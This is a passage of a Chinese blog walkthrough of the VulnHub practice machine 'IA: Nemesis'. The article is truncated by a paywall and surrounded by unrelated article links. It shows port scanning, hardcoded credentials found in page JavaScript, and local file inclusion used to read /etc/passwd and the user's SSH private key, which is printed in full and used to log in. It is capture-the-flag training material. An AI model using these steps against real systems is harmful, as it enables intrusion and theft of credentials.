IA: Nemesis (1.0.1) vulnhub walkthrough

最新推荐文章于 2025-01-13 18:59:24 发布
最新推荐文章于 2025-01-13 18:59:24 发布
阅读量2.2k 收藏 8
点赞数 4
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xdeclearn/article/details/109309103
版权
本文介绍了在Vulnhub上的IA: Nemesis (1.0.1)虚拟机的渗透测试过程。通过服务探测、Web渗透测试和提权,逐步获取三个flag。在web渗透中,利用本地文件包含漏洞(LFI)获取SSH私钥,进而登录获取第一个flag。通过替换脚本反弹shell,得到第二个flag。最后,破解加密算法,提权至root获取第三个flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

IA: Nemesis (1.0.1)

虚拟机页面:http://www.vulnhub.com/entry/ia-nemesis-101,582/

Description

  • Difficulty: Intermediate to Hard
  • Goal: Get the root shell and read all the 3 flags.
  • Information: You need some good encryption and programming skills to root this box. Please solve this challenge by using only the intended way, any unintended way will not be apprecitated.
  • If you need any hints, you can contact us on Twitter (@infosecarticles)

服务探测

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
52845/tcp open  http    nginx 1.14.2
52846/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web渗透测试

80端口服务有一个登录入口,在页面的validateForm函数中得到了用户名和密码,但是登录后没有任何东西。

<!DOCTYPE html>
function validateForm() {
   
  var x = document.forms["myForm"]["uname"].value;
  var y = document.forms["myForm"]["pass"].value; 
  if (x == "") {
   
    alert("Name must be filled out");
    return false;
  }
 if (y == "") {
   
    alert("Password must be filled out");
    return false; 
}
 if (x == "hacker_in_the_town" && y == "thanos")
	{
   
		document.write("You will be redirected to main page in 3 sec.");
            	setTimeout('validate()', 3000);
	}
}

紧接着访问52845端口,在#contact中尝试输入任意信息然后提交,出现提示Message has been saved in a file,于是在Message中输入/etc/passwd,成功实现了LFI。
lfi
passwd

之后,尝试了一些常见log读取失败后,尝试ssh登录thanos,发现需要私钥认证。

kali@kali:~$ ssh -p 52846 thanos@192.168.56.42 
thanos@192.168.56.42: Permission denied (publickey).

尝试利用LFI获取thanos私钥/home/thanos/.ssh/id_rsa,成功并实现ssh登录,获取到第一个flag。

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA1H2rDU6AnY2LSnOSLpXxZ7Fb0HPfQQds2SdQzvBH6NNSIuLFsebl
2fAgeirNWD2LHs3C/8jPyy1GRsxFd9U0yF2hO0aRBASSWU+WzLTIeLvaPircn8P1l528cX
HoWvXnzKsZLibrFos6H3krrRJ8Y+U/BI8dPHVEc35j6z79kjZo9ywrCRFigsjnG/YnPfCi
ZwgxwUBHdJxyuugc9PiEMaDVGVL84gVNknR4INOLCCa8kSGoHfuW0+D67pDgtqzRup4io0
PurjeH9183JrSJe5Wa0aL7mz2aeaVRLS9ICCfmLp+Rp3nfGDolATqWpbtfvRUAbplL1R8N
VVyKFPkptQAAA8j/NR2S/zUdkgAAAAdzc2gtcnNhAAABAQDUfasNToCdjYtKc5IulfFnsV
vQc99BB2zZJ1DO8Efo01Ii4sWx5uXZ8CB6Ks1YPYsezcL/yM/LLUZGzEV31TTIXaE7RpEE
BJJZT5bMtMh4u9o+Ktyfw/WXnbxxceha9efMqxkuJusWizofeSutEnxj5T8Ejx08dURzfm
PrPv2SNmj3LCsJEWKCyOcb9ic98KJnCDHBQEd0nHK66Bz0+IQxoNUZUvziBU2SdHgg04sI
JryRIagd+5bT4PrukOC2rNG6niKjQ+6uN4f3XzcmtIl7lZrRovubPZp5pVEtL0gIJ+Yun5
Gned8YOiUBOpalu1+9FQBumUvVHw1VXIoU+Sm1AAAAAwEAAQAAAQEAkBkElYqF59IkAoIr
QNJIGfSJeewKGxRI+V4TC7KgYUBlM+kq/cDCYK/Zpl8+T7e0j1gkA8ePOo5iWQKPnXsFR1
dPTl5FWz8qa8xwTDPQuydREdWJNgLymjXKo/gGBSE7Z20kL0sPI4OZD9zhBIZDuo6s1I+k
2OoBWHz+j3pxBOQKmApkbtwkKSli75xuzYaDt/OMy8/t+ML5ocTXSqJ4p00uH231OLCwKK
Ek5u1mrJQ07SYIK7g1pr1nwru9eMf4lKcT4KKPvPmaNorooYo86QO9bQk61DCjMEdh0uI7
hwUd5welBALIhUU3JFBznj7Xo8WnK0JFOJD2qAJQrFtz4QAAAIBJPdwoMasCzCOdLtkbC+
DPFhHH1cJ/kPUusNMV03xkOk0XjsZ06gwnvWQSTp0bE+zC8YmKCj23bNP/XDBhAogmVTqw
S4a+lO5gJutRT2rFSYBc58NIH3A4/IPKLbqy1+8+WuIce98eHsUliiTpcDwv5JYUkWHjCx
CKtfPIcrW8YAAAAIEA7dSwRfEti3jd/Prm/zfb1sbkwpo6oiLCum3E9fLIi0iWmqUFcTvd
xbh5xOweywAUs/jYpPw3pK3ZIwQC8tGbHKNVDPtXBSk+5qTRZv5FvAZTH9xiQeSGNiPPMi
FWOc1CpeNywEDY/k43wyIQSIeXjR1z8ZxFkf8u/l4poFE2eX0AAACBAOS5ZqSQ9cbv8Rm2
zIUmIQvBvG0cegsKaDx4ZMK0I2J3kLKM+qWbQbSxVWt/NOHMQGfrDD2MIX61fN7JjqL4E0
KzmgYQleQRM3U3RGpynnimPBzd3NmvpVxBFb3wg/U9rIlrGzzUkwQZRtntox6k3jka8oHd
U5RDT6RIBqdYiiaZAAAADnRoYW5vc0BuZW1lc2lzAQIDBA==
-----END OPENSSH PRIVATE KEY-----

kali@kali:~$ ssh -p 52846 -i id thanos@192.168.56.42 
Linux nemesis 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 26 08:48:39 2020 from 127.0.0.1
thanos@nemesis:~$ ls -all
total 40
drwxr-xr-x 4 thanos thanos 4096 Oct 25 10:05 .
drwxr-xr-x 4 root   root   4096 Oct  6 15:17 ..
-rw-r--r-- 1 carlos carlos  345 Oct  3 22:22 backup.py
-rw------- 1 thanos thanos 1065 Oct 26 09:11 .bash_history
-rw-r--r-- 1 th
最低0.47元/天 解锁文章
第一次作业
qq_29708141的博客
08-05 2万+
#include int main(void) { printf("Nice to meet you,C!I am yangmingxin\n"); return 0; }#include int main(void) { printf("  *      *\n"); printf(" ***    ***\n"); printf("*****   *****\n"); p
靶机渗透练习89-IANemesis (1.0.1)
hirak0的博客
05-01 3871
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
vulnhub靶场【IA系列】之Nemesis
最新发布
China_I_LOVE的博客
01-13 1199
网站的比较,这里是进行网站复制时,存在一个文件包含漏洞,不过这里的数据包是POST的,但是这里我没有抓取数据包分析,而是直接进行对比网站以及提示存放在文件,进行的测试了解一般用户的ssh公私钥等的存放位置,以及默认名称对于python调用模块时,其实是调用py文件,不过一般是从库里直接调用。但是还是会先从同级目录进行调用,若没有,再从库调用pspy64的使用,可以查看到很多看不到的对于仿射加密的了解,虽然这里可以直接借助ai识别,并进行生成破解的代码,但是还是要去了解下对于sudo。
Metasploit - auxiliary/gather/zoomeye_search
热门推荐
Nixawk
10-19 54万+
How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.
392. Is Subsequence
zhangshjzzz的博客
01-18 2126
内容:Given a string s and a string t, check if s is subsequence of t.You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string
MySQL的Binlog和InnoDB的redo log的关系、以及 "两阶段提交"
jzzw的博客
05-05 3519
数据库的日志类型大概可以分为以下三种:逻辑日志,记录的是sql语句的原始逻辑,面向对象是逻辑结构如表、列等物理日志,记录的是文件记录的改变,面向对象是表空间、数据文件、数据页、偏移量等逻辑物理日志,页面内的操作记录的是逻辑日志,页间的操作记录的是物理日志,physical to a page,logical within a page redo log和binlog的关系和Oracle的redo...
NTP:Nemesis 传输协议(Win32、Linux、OS2)
07-11
复仇者传输协议 (NTP) (NTP) 是与 Windows、Linux 和 OS/2 中的 BBS 程序一起使用的文件传输客户端/服务器集。 用户将启动用户端(服务器)应用程序。 一旦连接到 bbs,他们就会选择使用 NTP 协议下载。...
nemesis:命令行网络数据包制作和注入实用程序
05-14
NEMESIS-Craft.io与注塑 Nemesis项目被设计为基于命令行的,可移植的人类IP堆栈,适用于类似UNIX和Windows的系统。 该套件按协议细分,应允许对来自简单shell脚本的注入数据包进行有用的脚本编写。 始终可以从...
Arch i3Nemesis:弓i3Nemesis-开源
05-27
通过Arch i3Nemesis向自己介绍平铺Windows管理器的世界。
nemesis:一个开源的javascript游戏引擎
06-13
Nemesis是一个开源的JavaScript游戏引擎,专为创建互动式、高性能的游戏而设计。它提供了丰富的功能和工具,使得开发者可以轻松地构建2D和3D游戏,无需深入理解底层图形编程的复杂性。Nemesis引擎的核心目标是提供一...
Oracle table move tablespace
jzzw的博客
06-18 2393
Oracle table move tablespace操作总结: 1.非分区表move ALTER TABLE IDW_FINA.OS_OA_FAMILY_ORDERITEM move tablespace IDWD_TBS002; move完成后修改default tablespace attributes ALTER TABLE IDW_FINA.OS_OA_FAMILY_ORDERITEM DEFAULT ATTRIBUTES TABLESPACE IDWD_T...
JZZ-gui-Player:用于浏览器的MIDI播放器
04-30
JZZ-gui-Player 用于浏览器的MIDI播放器GUI 观看... 安装 npm install jzz-gui-player --save 或bower install jzz-gui-player 或yarn add jzz-gui-player 或从获取完整的开发版本和缩小的脚本 用法 Web组件(聚合物) https://github.com/jazz-soft/polymer-midi-player 纯HTML < script src =" JZZ.js " > </ script > < script src =" JZZ.midi.SMF.js " > </ script > < script src =" JZZ.gui.Player.js " > </ script > //... CDN(jsdelivr) < script src =" h
UninstallWMISchemaExecute (0x8004401e) when updating VisualSVN(不是有效的MOF文件)
ghjzzhg的博客
07-27 1810
之前安装的 TortoiseSVN服务器和客户端出现问题,想要卸载掉重新安装,却一直卸载不干净,导致没法重新再安装,于是乎在网上找相关的资料,发现老外的这个版本的对于这个问题有点效果,就尝试着做了... 原博客论坛:点击打开链接 我的操作: 1、进入开始输入services.msc服务中,找到WMI这个选项并将其设置为禁用 2、然后进入C:\Windows\System32\wbem
Mysql学习总结_20190307
jzzw的博客
03-07 270
mysql查看版本的方法: [root@rhel6 ~]# mysql --version mysql Ver 14.14 Distrib 5.7.19, for linux-glibc2.12 (x86_64) using EditLine wrapper mysql&gt; status -------------- mysql Ver 14.14 Distrib 5.7.19...
[转贴]自己动手写操作系统
07-22 1204
自己动手写操作系统(一) 作者:伊梅 自由软件社区是一个充满自由和梦想的地方,在10余年的时间里它创造了一个又一个奇迹。然而,这些奇迹的创造者不只是Stallman,也不只是Linus Torvalds,而是活跃在世界各地的不计其数的开发人员。 在使用各种功能强大的自由软件时,我总会对其开发者充满崇敬之情,期盼有朝一日自己也能成为他们中的一员。很多对自由社区充满向往之情的人,虽然也想
Get the Android SDK
lyy1104的专栏
05-19 1401
Get the Android SDK The Android SDK provides you the API libraries and developer tools necessary to build, test, and debug apps for Android. If you're a new Android developer, we recommend you downl
靶机渗透练习87-IA:Keyring (1.0.1)
hirak0的博客
04-30 1690
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ Description Difficulty: Intermediate Goal: Get the root shell and read all the 2 flags. Information: No hints will be provided before 24 hours of the release. Try Harder! If you need any hints,
Vulnhub-IA: KEYRING (1.0.1)渗透
laoyanCZ的博客
12-16 1041
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
新东方老师力荐口语学习必看25部电影
4克拉
05-25 1147
新东方老师力荐口语学习必看25部电影1. 阿甘正传 “FORREST GUMP” 主演:Tom Hanks 汤姆 汉克斯2. 电子情书 “YOU’VE GOT MAIL” 主演:Tom Hanks 汤姆 汉克斯 Meg Ryan 梅格 瑞安3居家男人 “THE FAMILY MAN” 主演:Nicolas Cage 尼科拉斯 凯奇 Tea Leoni 蒂 里奥尼4公主日记I.II. “TH
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值